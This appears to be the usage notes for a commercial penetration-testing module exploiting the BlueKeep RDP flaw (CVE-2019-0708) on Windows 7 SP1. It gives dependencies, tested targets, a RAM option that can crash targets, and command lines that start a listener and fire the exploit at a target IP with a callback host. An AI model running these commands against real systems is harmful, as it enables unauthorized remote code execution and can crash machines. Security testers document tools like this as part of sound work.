Immunity Canvas: BLUEKEEP

If you do not select “Allow remote code execution” from the module’s dialog
it will simply test to see if the target is vulnerable (safe).

This module requires asn1tools to be installed (python) and can only run
on Linux hosts for now (due to our use of ctypes).

prompt-toolkit is an internal dependency of asn1tools, make sure to have a version
on the 2.x branch, ideally 2.0.9. Any version on the 1.x branch should generate errors.
Our linux_installer has been updated to take care of these new dependencies.

Tested against:
- Windows 7 Ultimate N (x86) [SP1 only]
- Windows 7 Ultimate (x64) with 2, 4/8 GB of RAM [SP1 only]
- Windows 7 Enterprise (x64) with 2, 4/8 GB of RAM [SP1 only]
- Windows 7 Professional (x64) with 4GB of RAM [SP1 only]

In this new release we have included the ability to specify the amount of RAM for
the target system which highly improves reliability and speed. This option is of
course optional, the module is fine-tuned as it is for what reported under
“Tested against”. An incorrect value specified for the amount RAM can cause a BSOD
on the target system.

An updated version of the exploit will soon handle more Windows versions.

To get a node on the CLI:
[TERMINAL #1]$ ./commandlineInterface.py -v 17 -p 5555
[TERMINAL #2]$ python2 exploits/remote/windows/BLUEKEEP/BLUEKEEP.py -t 192.168.1.9 -l 192.168.1.10 -d 5555

Repeatability:
Date public:
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0708
CVSS: 10.0